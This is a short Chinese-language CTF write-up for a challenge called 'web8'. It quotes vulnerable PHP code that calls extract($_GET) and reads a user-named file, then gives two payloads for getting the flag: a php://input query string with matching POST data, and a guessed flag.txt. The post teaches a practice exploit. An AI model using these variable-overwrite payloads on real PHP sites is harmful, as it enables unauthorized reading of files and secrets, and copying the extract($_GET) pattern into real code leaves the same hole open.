Web安全

web8

2018-09-05  本文已影响0人  胖佳儿Clara

web8
110
txt????
http://120.24.86.145:8002/web8/

<?php
extract($_GET);
if (!empty($ac))
{
$f = trim(file_get_contents($fn));
if ($ac === $f)
{
echo "<p>This is flag:" ." $flag</p>";
}
else
{
echo "<p>sorry!</p>";
}
}
?>

可知,获取flag要使ac不为空,f 的值从文件fn中获取,并且ac===f


姿势1:构造payload:
url:?/ac=aa&&fn=php://input
post data :aa

姿势2 :猜测目录下有txt文件,测试出flag.txt。构造:
?ac=flags&fn=flag.txt

可得出flag


上一篇 下一篇

猜你喜欢

热点阅读